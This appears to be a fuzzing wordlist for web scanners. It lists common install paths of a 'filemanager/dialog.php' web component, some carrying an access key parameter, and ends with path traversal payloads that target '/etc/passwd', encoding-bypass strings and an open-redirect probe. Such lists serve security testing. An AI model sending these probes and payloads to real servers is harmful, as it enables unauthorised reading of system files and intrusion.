filemanager/
filemanager/dialog,php
js/filemanager/
js/filemanager/dialog.php
assets/js/filemanager/
assets/js/filemanager/dialog.php
admin/js/filemanager/
admin/filemanager/dialog.php
admin/assets/js/filemanager/
admin/assets/js/filemanager/dialog.php
assets/filemanager/
assets/filemanager/dialog.php
admin/assets/filemanager/
admin/assets/filemanager/dialog.php
plugin/filemanager/dialog.php?akey=4r5S-KduJ7ts098
admin/plugin/filemanager/dialog.php?akey=4r5S-KduJ7ts098
plugin/filemanager/
%2e%2e//google.com
%ff
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e;/test
%3f/
%C0%AE%C0%AE%C0%AF
../../../../../../etc/passwd
..;/
cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd